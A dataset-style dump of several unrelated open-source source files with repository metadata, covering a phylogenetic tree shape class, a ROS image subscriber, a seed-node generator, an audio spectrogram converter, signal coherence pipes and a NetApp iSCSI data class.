raise ValueError("No key could be detected.")
return cls(private_key, key_id=key_id)
| true | true |
1c4a9db4d968f272c0318dc71a033cc4af40f6ef | 6,241 | py | Python | biotrees/shape/__init__.py | bielr/biotrees | dc588888cec557d9522fc6faaa560488a95c946d | [
"Apache-2.0"
] | null | null | null | biotrees/shape/__init__.py | bielr/biotrees | dc588888cec557d9522fc6faaa560488a95c946d | [
"Apache-2.0"
] | null | null | null | biotrees/shape/__init__.py | bielr/biotrees | dc588888cec557d9522fc6faaa560488a95c946d | [
"Apache-2.0"
] | null | null | null | from biotrees.util import iter_merge, skip_nth
"""
A `Shape` represents a topological tree. The data structure implemented here is of recursive type: a `Shape` can be
either a leaf or a list of `Shape` objects. Leaves are not distinguishable, but we know that they are leaves.
We choose a sorted shape to be the class representant of all shapes isomorphic to it.
"""
__all__ = ['Shape']
class Shape(object):
LEAF = None # filled in after class def
CHERRY = None # filled in after class def
"""
A `Shape` instance is either a leaf or a list of `Shape` instances that hang from a root.
"""
def __init__(self, children=None):
"""
Create a new `Shape` object.
The boolean is_leaf is True if the object is a leaf; it is False otherwise.
:param children: `list` instance.
:return: `Shape` instance.
"""
assert children is None or len(children) > 0
self.children = children
def is_leaf(self):
return self.children is None
def clone(self):
"""
Returns `Shape` instance which is exactly the same as self.
:return: `Shape` instance.
"""
if self.is_leaf():
return Shape.LEAF
else:
return Shape([ch.clone() for ch in self.children])
def _is_sorted(self):
if self.is_leaf():
return True
children = self.children
return all(ch._is_sorted() for ch in children) and \
all(ch1 <= ch2 for ch1, ch2 in zip(children[:-1], children[1:]))
def _sort(self):
"""
Sorts self using lexicographical order.
"""
if self.is_leaf():
return
for t in self.children:
t._sort()
self.children.sort()
def compare(self, t2):
"""
Compare self with another `Shape` object. We use lexicographical order in order to compare two `Shape` instances.
Leaves in this case are indistinguishable. It returns anint c, which is 0 if self and T2 are equal, < 0 if
self < T2, and > 0 if self > T2.
:param t2: `Shape` instance.
:return: `int` instance.
"""
if self.is_leaf() and t2.is_leaf():
return 0
elif self.is_leaf():
return -1
elif t2.is_leaf():
return 1
else:
c = len(self.children) - len(t2.children)
if c != 0:
return c
for t1, t2 in zip(self.children, t2.children):
c = t1.compare(t2)
if c != 0:
return c
return c
def __lt__(self, t2):
"""
Uses the comparing method above to decide if self is less than T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) < 0
def __le__(self, t2):
"""
Uses the comparing method above to decide if self is less or equal than T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) <= 0
def __eq__(self, t2):
"""
Uses the comparing method above to decide if self is equal to T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) == 0
def __ne__(self, t2):
"""
Uses the comparing method above to decide if self is not equal to T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) != 0
def __ge__(self, t2):
"""
Uses the comparing method above to decide if self is greater or equal than T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) >= 0
def __gt__(self, t2):
"""
Uses the comparing method above to decide if self is greater than T2.
:param t2: the `Shape` object against which we compare self.
:return: `bool` instance.
"""
return self.compare(t2) > 0
def __str__(self):
from biotrees.shape.newick import to_newick
return to_newick(self)
def __repr__(self):
return str(self)
def shape(self):
"""
Returns the `Shape` associated to self. Namely, it "forgets" the labels of the leafs.
:return: `Shape` instance.
"""
return self
Shape.LEAF = Shape()
Shape.CHERRY = Shape([Shape.LEAF, Shape.LEAF])
def is_binary(t):
"""
Returns True if t is a binary shape.
:return: `bool` instance
"""
return t.is_leaf() or \
(len(t.children) == 2 and all(is_binary(ch) for t in t.children))
def count_leaves(t):
"""
Returns the number of leaves in t.
:return: `int` instance.
"""
if t.is_leaf():
return 1
else:
return sum(count_leaves(t) for t in t.children)
def get_depth(t):
"""
Returns an integer representing the maximal depth of the shape, from the root to one
of its furthest leaves.
:return: `int` instance.
"""
if t.is_leaf():
return 0
else:
return max(get_depth(ch) for ch in t.children) + 1
def leaf_depths(t):
"""
Returns a generator of integers representing the depth of each leaf in the tree
:return: generator of integers
"""
if t.is_leaf():
yield 0
else:
for ch in t.children:
for depth in leaf_depths(ch):
yield depth+1
def get_leaf_depths(t):
"""
Returns a list of integers representing the depth of each leaf in the tree
:return: list of integers
"""
return list(leaf_depths(t))
def count_nodes_by_depth(t):
total_depth = get_depth(t)
nodes_by_depth = [0]*(total_depth+1)
def navigate(t2, d):
if not t2.is_leaf():
d1 = d+1
nodes_by_depth[d1] += len(t2.children)
for ch in t2.children:
navigate(ch, d1)
nodes_by_depth[0] += 1
navigate(t, 0)
return nodes_by_depth
| 28.239819 | 121 | 0.577792 | from biotrees.util import iter_merge, skip_nth
__all__ = ['Shape']
class Shape(object):
LEAF = None CHERRY = None
def __init__(self, children=None):
assert children is None or len(children) > 0
self.children = children
def is_leaf(self):
return self.children is None
def clone(self):
if self.is_leaf():
return Shape.LEAF
else:
return Shape([ch.clone() for ch in self.children])
def _is_sorted(self):
if self.is_leaf():
return True
children = self.children
return all(ch._is_sorted() for ch in children) and \
all(ch1 <= ch2 for ch1, ch2 in zip(children[:-1], children[1:]))
def _sort(self):
if self.is_leaf():
return
for t in self.children:
t._sort()
self.children.sort()
def compare(self, t2):
if self.is_leaf() and t2.is_leaf():
return 0
elif self.is_leaf():
return -1
elif t2.is_leaf():
return 1
else:
c = len(self.children) - len(t2.children)
if c != 0:
return c
for t1, t2 in zip(self.children, t2.children):
c = t1.compare(t2)
if c != 0:
return c
return c
def __lt__(self, t2):
return self.compare(t2) < 0
def __le__(self, t2):
return self.compare(t2) <= 0
def __eq__(self, t2):
return self.compare(t2) == 0
def __ne__(self, t2):
return self.compare(t2) != 0
def __ge__(self, t2):
return self.compare(t2) >= 0
def __gt__(self, t2):
return self.compare(t2) > 0
def __str__(self):
from biotrees.shape.newick import to_newick
return to_newick(self)
def __repr__(self):
return str(self)
def shape(self):
return self
Shape.LEAF = Shape()
Shape.CHERRY = Shape([Shape.LEAF, Shape.LEAF])
def is_binary(t):
return t.is_leaf() or \
(len(t.children) == 2 and all(is_binary(ch) for t in t.children))
def count_leaves(t):
if t.is_leaf():
return 1
else:
return sum(count_leaves(t) for t in t.children)
def get_depth(t):
if t.is_leaf():
return 0
else:
return max(get_depth(ch) for ch in t.children) + 1
def leaf_depths(t):
if t.is_leaf():
yield 0
else:
for ch in t.children:
for depth in leaf_depths(ch):
yield depth+1
def get_leaf_depths(t):
return list(leaf_depths(t))
def count_nodes_by_depth(t):
total_depth = get_depth(t)
nodes_by_depth = [0]*(total_depth+1)
def navigate(t2, d):
if not t2.is_leaf():
d1 = d+1
nodes_by_depth[d1] += len(t2.children)
for ch in t2.children:
navigate(ch, d1)
nodes_by_depth[0] += 1
navigate(t, 0)
return nodes_by_depth
| true | true |
1c4a9e04658f85d01a0faf1688239f940ae2016c | 552 | py | Python | scripts/subscribe_kinect.py | hubertbraszko/follow-marker | 2c168c2c9705fc2076712e20c62e05a439df6cf8 | [
"BSD-3-Clause"
] | null | null | null | scripts/subscribe_kinect.py | hubertbraszko/follow-marker | 2c168c2c9705fc2076712e20c62e05a439df6cf8 | [
"BSD-3-Clause"
] | null | null | null | scripts/subscribe_kinect.py | hubertbraszko/follow-marker | 2c168c2c9705fc2076712e20c62e05a439df6cf8 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
import rospy
from std_msgs.msg import String
import sys
import cv2
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
def process_image(msg):
bridge = CvBridge()
img = bridge.imgmsg_to_cv2(msg, "bgr8")
cv2.imshow("image",img)
cv2.waitKey(50)
if __name__ == '__main__':
while not rospy.is_shutdown():
rospy.init_node('kinect_subscriber')
rospy.loginfo('image_sub node started')
rospy.Subscriber("/base_kinect/color/image_raw", Image, process_image)
rospy.spin()
| 25.090909 | 78 | 0.706522 | import rospy
from std_msgs.msg import String
import sys
import cv2
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
def process_image(msg):
bridge = CvBridge()
img = bridge.imgmsg_to_cv2(msg, "bgr8")
cv2.imshow("image",img)
cv2.waitKey(50)
if __name__ == '__main__':
while not rospy.is_shutdown():
rospy.init_node('kinect_subscriber')
rospy.loginfo('image_sub node started')
rospy.Subscriber("/base_kinect/color/image_raw", Image, process_image)
rospy.spin()
| true | true |
1c4a9e3834a7eccc3c3b7c6fddcede09ac3c225d | 4,372 | py | Python | contrib/seeds/generate-seeds.py | pniwre/Sato_origin | 5accbe690dbd2cae305cc7120a4824243f89701c | [
"MIT"
] | null | null | null | contrib/seeds/generate-seeds.py | pniwre/Sato_origin | 5accbe690dbd2cae305cc7120a4824243f89701c | [
"MIT"
] | null | null | null | contrib/seeds/generate-seeds.py | pniwre/Sato_origin | 5accbe690dbd2cae305cc7120a4824243f89701c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2017 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Script to generate list of seed nodes for chainparams.cpp.
This script expects two text files in the directory that is passed as an
argument:
nodes_main.txt
nodes_test.txt
These files must consist of lines in the format
<ip>
<ip>:<port>
[<ipv6>]
[<ipv6>]:<port>
<onion>.onion
0xDDBBCCAA (IPv4 little-endian old pnSeeds format)
The output will be two data structures with the peers in binary format:
static SeedSpec6 pnSeed6_main[]={
...
}
static SeedSpec6 pnSeed6_test[]={
...
}
These should be pasted into `src/chainparamsseeds.h`.
'''
from base64 import b32decode
from binascii import a2b_hex
import sys, os
import re
# ipv4 in ipv6 prefix
pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff])
# tor-specific ipv6 prefix
pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43])
def name_to_ipv6(addr):
if len(addr)>6 and addr.endswith('.onion'):
vchAddr = b32decode(addr[0:-6], True)
if len(vchAddr) != 16-len(pchOnionCat):
raise ValueError('Invalid onion %s' % s)
return pchOnionCat + vchAddr
elif '.' in addr: # IPv4
return pchIPv4 + bytearray((int(x) for x in addr.split('.')))
elif ':' in addr: # IPv6
sub = [[], []] # prefix, suffix
x = 0
addr = addr.split(':')
for i,comp in enumerate(addr):
if comp == '':
if i == 0 or i == (len(addr)-1): # skip empty component at beginning or end
continue
x += 1 # :: skips to suffix
assert(x < 2)
else: # two bytes per component
val = int(comp, 16)
sub[x].append(val >> 8)
sub[x].append(val & 0xff)
nullbytes = 16 - len(sub[0]) - len(sub[1])
assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0))
return bytearray(sub[0] + ([0] * nullbytes) + sub[1])
elif addr.startswith('0x'): # IPv4-in-little-endian
return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:])))
else:
raise ValueError('Could not parse address %s' % addr)
def parse_spec(s, defaultport):
match = re.match('\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s)
if match: # ipv6
host = match.group(1)
port = match.group(2)
elif s.count(':') > 1: # ipv6, no port
host = s
port = ''
else:
(host,_,port) = s.partition(':')
if not port:
port = defaultport
else:
port = int(port)
host = name_to_ipv6(host)
return (host,port)
def process_nodes(g, f, structname, defaultport):
g.write('static SeedSpec6 %s[] = {\n' % structname)
first = True
for line in f:
comment = line.find('#')
if comment != -1:
line = line[0:comment]
line = line.strip()
if not line:
continue
if not first:
g.write(',\n')
first = False
(host,port) = parse_spec(line, defaultport)
hoststr = ','.join(('0x%02x' % b) for b in host)
g.write(' {{%s}, %i}' % (hoststr, port))
g.write('\n};\n')
def main():
if len(sys.argv)<2:
print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr)
sys.exit(1)
g = sys.stdout
indir = sys.argv[1]
g.write('#ifndef RAVEN_CHAINPARAMSSEEDS_H\n')
g.write('#define RAVEN_CHAINPARAMSSEEDS_H\n')
g.write('/**\n')
g.write(' * List of fixed seed nodes for the sato network\n')
g.write(' * AUTOGENERATED by contrib/seeds/generate-seeds.py\n')
g.write(' *\n')
g.write(' * Each line contains a 16-byte IPv6 address and a port.\n')
g.write(' * IPv4 as well as onion addresses are wrapped inside a IPv6 address accordingly.\n')
g.write(' */\n')
with open(os.path.join(indir,'nodes_main.txt'), 'r', encoding="utf8") as f:
process_nodes(g, f, 'pnSeed6_main', 8767)
g.write('\n')
with open(os.path.join(indir,'nodes_test.txt'), 'r', encoding="utf8") as f:
process_nodes(g, f, 'pnSeed6_test', 18767)
g.write('#endif // RAVEN_CHAINPARAMSSEEDS_H\n')
if __name__ == '__main__':
main()
| 31.453237 | 98 | 0.579597 |
from base64 import b32decode
from binascii import a2b_hex
import sys, os
import re
pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff])
pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43])
def name_to_ipv6(addr):
if len(addr)>6 and addr.endswith('.onion'):
vchAddr = b32decode(addr[0:-6], True)
if len(vchAddr) != 16-len(pchOnionCat):
raise ValueError('Invalid onion %s' % s)
return pchOnionCat + vchAddr
elif '.' in addr: return pchIPv4 + bytearray((int(x) for x in addr.split('.')))
elif ':' in addr: sub = [[], []] x = 0
addr = addr.split(':')
for i,comp in enumerate(addr):
if comp == '':
if i == 0 or i == (len(addr)-1): continue
x += 1 assert(x < 2)
else: val = int(comp, 16)
sub[x].append(val >> 8)
sub[x].append(val & 0xff)
nullbytes = 16 - len(sub[0]) - len(sub[1])
assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0))
return bytearray(sub[0] + ([0] * nullbytes) + sub[1])
elif addr.startswith('0x'): return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:])))
else:
raise ValueError('Could not parse address %s' % addr)
def parse_spec(s, defaultport):
match = re.match('\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s)
if match: host = match.group(1)
port = match.group(2)
elif s.count(':') > 1: host = s
port = ''
else:
(host,_,port) = s.partition(':')
if not port:
port = defaultport
else:
port = int(port)
host = name_to_ipv6(host)
return (host,port)
def process_nodes(g, f, structname, defaultport):
g.write('static SeedSpec6 %s[] = {\n' % structname)
first = True
for line in f:
comment = line.find('#')
if comment != -1:
line = line[0:comment]
line = line.strip()
if not line:
continue
if not first:
g.write(',\n')
first = False
(host,port) = parse_spec(line, defaultport)
hoststr = ','.join(('0x%02x' % b) for b in host)
g.write(' {{%s}, %i}' % (hoststr, port))
g.write('\n};\n')
def main():
if len(sys.argv)<2:
print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr)
sys.exit(1)
g = sys.stdout
indir = sys.argv[1]
g.write('#ifndef RAVEN_CHAINPARAMSSEEDS_H\n')
g.write('#define RAVEN_CHAINPARAMSSEEDS_H\n')
g.write('/**\n')
g.write(' * List of fixed seed nodes for the sato network\n')
g.write(' * AUTOGENERATED by contrib/seeds/generate-seeds.py\n')
g.write(' *\n')
g.write(' * Each line contains a 16-byte IPv6 address and a port.\n')
g.write(' * IPv4 as well as onion addresses are wrapped inside a IPv6 address accordingly.\n')
g.write(' */\n')
with open(os.path.join(indir,'nodes_main.txt'), 'r', encoding="utf8") as f:
process_nodes(g, f, 'pnSeed6_main', 8767)
g.write('\n')
with open(os.path.join(indir,'nodes_test.txt'), 'r', encoding="utf8") as f:
process_nodes(g, f, 'pnSeed6_test', 18767)
g.write('#endif // RAVEN_CHAINPARAMSSEEDS_H\n')
if __name__ == '__main__':
main()
| true | true |
1c4a9e6deb4f7f104b05973b61354f9580522564 | 460 | py | Python | bin/rehex.py | CryptoDEX/sentinel | 88ac417f34c4f42670298abf3f252ab8652b7887 | [
"MIT"
] | null | null | null | bin/rehex.py | CryptoDEX/sentinel | 88ac417f34c4f42670298abf3f252ab8652b7887 | [
"MIT"
] | null | null | null | bin/rehex.py | CryptoDEX/sentinel | 88ac417f34c4f42670298abf3f252ab8652b7887 | [
"MIT"
] | null | null | null | import simplejson
import binascii
import sys
import pdb
from pprint import pprint
import sys
import os
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../lib')))
import cryptodexlib
# ============================================================================
usage = "%s <hex>" % sys.argv[0]
obj = None
if len(sys.argv) < 2:
print(usage)
sys.exit(1)
else:
obj = cryptodexlib.deserialise(sys.argv[1])
pdb.set_trace()
1
| 20.909091 | 84 | 0.591304 | import simplejson
import binascii
import sys
import pdb
from pprint import pprint
import sys
import os
sys.path.append(os.path.normpath(os.path.join(os.path.dirname(__file__), '../lib')))
import cryptodexlib
usage = "%s <hex>" % sys.argv[0]
obj = None
if len(sys.argv) < 2:
print(usage)
sys.exit(1)
else:
obj = cryptodexlib.deserialise(sys.argv[1])
pdb.set_trace()
1
| true | true |
1c4a9e7ab48b06150d1646076a4a5a0117b6efcc | 2,186 | py | Python | utils/modify_ravdess.py | sahiljuneja/kaggle-ctds | caac226f2c5d33b6d324c5cf33a777758b9163d1 | [
"CC-BY-4.0"
] | null | null | null | utils/modify_ravdess.py | sahiljuneja/kaggle-ctds | caac226f2c5d33b6d324c5cf33a777758b9163d1 | [
"CC-BY-4.0"
] | null | null | null | utils/modify_ravdess.py | sahiljuneja/kaggle-ctds | caac226f2c5d33b6d324c5cf33a777758b9163d1 | [
"CC-BY-4.0"
] | null | null | null | import re
import os
import argparse
import librosa
import librosa.display
import matplotlib.pyplot as plt
import numpy as np
def modify_data(input_path, save_path, dir_dict):
path = os.listdir(input_path)
for folders in path:
folders = os.path.sep.join([input_path, folders])
for file in os.listdir(folders):
num = re.findall('\d+', file)
emotion = dir_dict[num[2]]
file_save_path = save_path + str(emotion)
if not os.path.isdir(file_save_path):
os.makedirs(file_save_path)
load_file_path = '{0}/{1}'.format(folders, file)
file_name = "/{}.jpeg".format(file[:-4])
if not os.path.isfile(file_save_path + file_name):
y, sr = librosa.load(load_file_path)
yt, _ = librosa.effects.trim(y)
y = yt
mel_spect = librosa.feature.melspectrogram(y=y, sr=sr, n_fft=1024, hop_length=100)
mel_spect = librosa.power_to_db(mel_spect, ref=np.max)
librosa.display.specshow(mel_spect, y_axis='mel', fmax=20000, x_axis='time');
plt.savefig(file_save_path + file_name)
#print("File saved to: {}".format(file_save_path + file_name))
if __name__ == "__main__":
# sample call
# python modify_ravdess.py -p /notebooks/storage/ravdess/ -s /notebooks/storage/ravdess_mod/
# arguments parser
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--path", type=str, help="path to raw data")
ap.add_argument("-s", "--save", type=str, help="path to save data after processing")
args = vars(ap.parse_args())
# directory structure dict
dir_dict = {'01' : 'neutral', '02' : 'calm', '03' : 'happy', '04' : 'sad',
'05' : 'angry', '06' : 'fearful', '07' : 'disgust', '08' : 'surprised'}
ip_path = args["path"]
save_path = args["save"]
if not os.path.isdir(save_path):
os.makedirs(save_path)
modify_data(ip_path, save_path, dir_dict)
print("Data converted from .wav to .jpeg")
| 31.681159 | 98 | 0.578225 | import re
import os
import argparse
import librosa
import librosa.display
import matplotlib.pyplot as plt
import numpy as np
def modify_data(input_path, save_path, dir_dict):
path = os.listdir(input_path)
for folders in path:
folders = os.path.sep.join([input_path, folders])
for file in os.listdir(folders):
num = re.findall('\d+', file)
emotion = dir_dict[num[2]]
file_save_path = save_path + str(emotion)
if not os.path.isdir(file_save_path):
os.makedirs(file_save_path)
load_file_path = '{0}/{1}'.format(folders, file)
file_name = "/{}.jpeg".format(file[:-4])
if not os.path.isfile(file_save_path + file_name):
y, sr = librosa.load(load_file_path)
yt, _ = librosa.effects.trim(y)
y = yt
mel_spect = librosa.feature.melspectrogram(y=y, sr=sr, n_fft=1024, hop_length=100)
mel_spect = librosa.power_to_db(mel_spect, ref=np.max)
librosa.display.specshow(mel_spect, y_axis='mel', fmax=20000, x_axis='time');
plt.savefig(file_save_path + file_name)
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--path", type=str, help="path to raw data")
ap.add_argument("-s", "--save", type=str, help="path to save data after processing")
args = vars(ap.parse_args())
dir_dict = {'01' : 'neutral', '02' : 'calm', '03' : 'happy', '04' : 'sad',
'05' : 'angry', '06' : 'fearful', '07' : 'disgust', '08' : 'surprised'}
ip_path = args["path"]
save_path = args["save"]
if not os.path.isdir(save_path):
os.makedirs(save_path)
modify_data(ip_path, save_path, dir_dict)
print("Data converted from .wav to .jpeg")
| true | true |
1c4aa08fdf2f3f6ab9a83890a7c17c9b27fbc3ac | 6,062 | py | Python | dyne/adjacency/coherence.py | akhambhati/dyne2 | d2f050b3d14ef429fc9c52821e87f1c9a52a521d | [
"BSD-3-Clause"
] | 7 | 2015-01-11T03:57:19.000Z | 2020-07-11T12:05:57.000Z | dyne/adjacency/coherence.py | akhambhati/dyne | d2f050b3d14ef429fc9c52821e87f1c9a52a521d | [
"BSD-3-Clause"
] | null | null | null | dyne/adjacency/coherence.py | akhambhati/dyne | d2f050b3d14ef429fc9c52821e87f1c9a52a521d | [
"BSD-3-Clause"
] | null | null | null | """
Coherence pipes for quantifying signal similarity (i.e. connectivity)
Created by: Ankit Khambhati
Change Log
----------
2016/03/06 - Implemented WelchCoh and MTCoh pipes
"""
from __future__ import division
import numpy as np
from mtspec import mt_coherence, mtspec
from scipy.signal import coherence
import matplotlib.pyplot as plt
from ..errors import check_type
from ..base import AdjacencyPipe
class WelchCoh(AdjacencyPipe):
"""
WelchCoh pipe for spectral coherence estimation using Welch's method
Parameters
----------
window: str
Desired window to use. See Scipy get_window for a list of windows.
secperseg: float
Length of each segment in seconds. Recommended half of window length.
pctoverlap: float (0<x<1)
Percent overlap between segments. Recommended values of 50 pct.
cf: list
Frequency range over which to compute coherence [-NW+C, C+NW]
"""
def __init__(self, window, secperseg, pctoverlap, cf):
# Standard param checks
check_type(window, str)
check_type(secperseg, float)
check_type(pctoverlap, float)
check_type(cf, list)
if not len(cf) == 2:
raise Exception('Must give a frequency range in list of length 2')
if (pctoverlap > 1) or (pctoverlap < 0):
raise Exception('Percent overlap must be a positive fraction')
# Assign to instance
self.window = window
self.secperseg = secperseg
self.pctoverlap = pctoverlap
self.cf = cf
def _pipe_as_flow(self, signal_packet):
# Get signal_packet details
hkey = signal_packet.keys()[0]
ax_0_ix = signal_packet[hkey]['meta']['ax_0']['index']
ax_1_ix = signal_packet[hkey]['meta']['ax_1']['index']
signal = signal_packet[hkey]['data']
fs = np.int(np.mean(1./np.diff(ax_0_ix)))
# Assume undirected connectivity
triu_ix, triu_iy = np.triu_indices(len(ax_1_ix), k=1)
# Initialize association matrix
adj = np.zeros((len(ax_1_ix), len(ax_1_ix)))
# Derive signal segmenting for coherence estimation
nperseg = int(self.secperseg*fs)
noverlap = int(self.secperseg*fs*self.pctoverlap)
freq, Cxy = coherence(signal[:, triu_ix],
signal[:, triu_iy],
fs=fs, window=self.window,
nperseg=nperseg, noverlap=noverlap,
axis=0)
# Find closest frequency to the desired center frequency
cf_idx = np.flatnonzero((freq >= self.cf[0]) &
(freq <= self.cf[1]))
# Store coherence in association matrix
adj[triu_ix, triu_iy] = np.mean(Cxy[cf_idx, :], axis=0)
adj += adj.T
new_packet = {}
new_packet[hkey] = {
'data': adj,
'meta': {
'ax_0': signal_packet[hkey]['meta']['ax_1'],
'ax_1': signal_packet[hkey]['meta']['ax_1'],
'time': {
'label': 'Time (sec)',
'index': np.float(ax_0_ix[-1])
}
}
}
return new_packet
class MTCoh(AdjacencyPipe):
"""
MTCoh pipe for spectral coherence estimation using
multitaper methods
Parameters
----------
time_band: float
The time half bandwidth resolution of the estimate [-NW, NW];
such that resolution is 2*NW
n_taper: int
Number of Slepian sequences to use (Usually < 2*NW-1)
cf: list
Frequency range over which to compute coherence [-NW+C, C+NW]
"""
def __init__(self, time_band, n_taper, cf):
# Standard param checks
check_type(time_band, float)
check_type(n_taper, int)
check_type(cf, list)
if n_taper >= 2*time_band:
raise Exception('Number of tapers must be less than 2*time_band')
if not len(cf) == 2:
raise Exception('Must give a frequency range in list of length 2')
# Assign instance parameters
self.time_band = time_band
self.n_taper = n_taper
self.cf = cf
def _pipe_as_flow(self, signal_packet):
# Get signal_packet details
hkey = signal_packet.keys()[0]
ax_0_ix = signal_packet[hkey]['meta']['ax_0']['index']
ax_1_ix = signal_packet[hkey]['meta']['ax_1']['index']
signal = signal_packet[hkey]['data']
fs = np.int(np.mean(1./np.diff(ax_0_ix)))
# Assume undirected connectivity
triu_ix, triu_iy = np.triu_indices(len(ax_1_ix), k=1)
# Initialize association matrix
adj = np.zeros((len(ax_1_ix), len(ax_1_ix)))
# Compute all coherences
for n1, n2 in zip(triu_ix, triu_iy):
out = mt_coherence(1.0/fs,
signal[:, n1],
signal[:, n2],
self.time_band,
self.n_taper,
int(len(ax_0_ix)/2.), 0.95,
iadapt=1,
cohe=True, freq=True)
# Find closest frequency to the desired center frequency
#cf_idx = np.argmin(np.abs(out['freq'] - self.cf))
cf_idx = np.flatnonzero((out['freq'] >= self.cf[0]) &
(out['freq'] <= self.cf[1]))
# Store coherence in association matrix
adj[n1, n2] = np.mean(out['cohe'][cf_idx])
adj += adj.T
new_packet = {}
new_packet[hkey] = {
'data': adj,
'meta': {
'ax_0': signal_packet[hkey]['meta']['ax_1'],
'ax_1': signal_packet[hkey]['meta']['ax_1'],
'time': {
'label': 'Time (sec)',
'index': np.float(ax_0_ix[-1])
}
}
}
return new_packet
| 32.591398 | 81 | 0.54421 |
from __future__ import division
import numpy as np
from mtspec import mt_coherence, mtspec
from scipy.signal import coherence
import matplotlib.pyplot as plt
from ..errors import check_type
from ..base import AdjacencyPipe
class WelchCoh(AdjacencyPipe):
def __init__(self, window, secperseg, pctoverlap, cf):
check_type(window, str)
check_type(secperseg, float)
check_type(pctoverlap, float)
check_type(cf, list)
if not len(cf) == 2:
raise Exception('Must give a frequency range in list of length 2')
if (pctoverlap > 1) or (pctoverlap < 0):
raise Exception('Percent overlap must be a positive fraction')
self.window = window
self.secperseg = secperseg
self.pctoverlap = pctoverlap
self.cf = cf
def _pipe_as_flow(self, signal_packet):
hkey = signal_packet.keys()[0]
ax_0_ix = signal_packet[hkey]['meta']['ax_0']['index']
ax_1_ix = signal_packet[hkey]['meta']['ax_1']['index']
signal = signal_packet[hkey]['data']
fs = np.int(np.mean(1./np.diff(ax_0_ix)))
triu_ix, triu_iy = np.triu_indices(len(ax_1_ix), k=1)
adj = np.zeros((len(ax_1_ix), len(ax_1_ix)))
nperseg = int(self.secperseg*fs)
noverlap = int(self.secperseg*fs*self.pctoverlap)
freq, Cxy = coherence(signal[:, triu_ix],
signal[:, triu_iy],
fs=fs, window=self.window,
nperseg=nperseg, noverlap=noverlap,
axis=0)
cf_idx = np.flatnonzero((freq >= self.cf[0]) &
(freq <= self.cf[1]))
adj[triu_ix, triu_iy] = np.mean(Cxy[cf_idx, :], axis=0)
adj += adj.T
new_packet = {}
new_packet[hkey] = {
'data': adj,
'meta': {
'ax_0': signal_packet[hkey]['meta']['ax_1'],
'ax_1': signal_packet[hkey]['meta']['ax_1'],
'time': {
'label': 'Time (sec)',
'index': np.float(ax_0_ix[-1])
}
}
}
return new_packet
class MTCoh(AdjacencyPipe):
def __init__(self, time_band, n_taper, cf):
check_type(time_band, float)
check_type(n_taper, int)
check_type(cf, list)
if n_taper >= 2*time_band:
raise Exception('Number of tapers must be less than 2*time_band')
if not len(cf) == 2:
raise Exception('Must give a frequency range in list of length 2')
self.time_band = time_band
self.n_taper = n_taper
self.cf = cf
def _pipe_as_flow(self, signal_packet):
hkey = signal_packet.keys()[0]
ax_0_ix = signal_packet[hkey]['meta']['ax_0']['index']
ax_1_ix = signal_packet[hkey]['meta']['ax_1']['index']
signal = signal_packet[hkey]['data']
fs = np.int(np.mean(1./np.diff(ax_0_ix)))
triu_ix, triu_iy = np.triu_indices(len(ax_1_ix), k=1)
adj = np.zeros((len(ax_1_ix), len(ax_1_ix)))
for n1, n2 in zip(triu_ix, triu_iy):
out = mt_coherence(1.0/fs,
signal[:, n1],
signal[:, n2],
self.time_band,
self.n_taper,
int(len(ax_0_ix)/2.), 0.95,
iadapt=1,
cohe=True, freq=True)
cf_idx = np.flatnonzero((out['freq'] >= self.cf[0]) &
(out['freq'] <= self.cf[1]))
adj[n1, n2] = np.mean(out['cohe'][cf_idx])
adj += adj.T
new_packet = {}
new_packet[hkey] = {
'data': adj,
'meta': {
'ax_0': signal_packet[hkey]['meta']['ax_1'],
'ax_1': signal_packet[hkey]['meta']['ax_1'],
'time': {
'label': 'Time (sec)',
'index': np.float(ax_0_ix[-1])
}
}
}
return new_packet
| true | true |
1c4aa09a56123eb89175e65ef12cd083888a57e1 | 3,456 | py | Python | generated-libraries/python/netapp/iscsi/iscsi_security_entry_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | 2 | 2017-03-28T15:31:26.000Z | 2018-08-16T22:15:18.000Z | generated-libraries/python/netapp/iscsi/iscsi_security_entry_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | generated-libraries/python/netapp/iscsi/iscsi_security_entry_info.py | radekg/netapp-ontap-lib-get | 6445ebb071ec147ea82a486fbe9f094c56c5c40d | [
"MIT"
] | null | null | null | from netapp.netapp_object import NetAppObject
class IscsiSecurityEntryInfo(NetAppObject):
"""
Information about a single authentication entry.
"""
_user_name = None
@property
def user_name(self):
"""
Inbound CHAP user name, returned only if auth-type is CHAP.
"""
return self._user_name
@user_name.setter
def user_name(self, val):
if val != None:
self.validate('user_name', val)
self._user_name = val
_auth_chap_policy = None
@property
def auth_chap_policy(self):
"""
CHAP authentication path. Possible values: "local",
"radius".
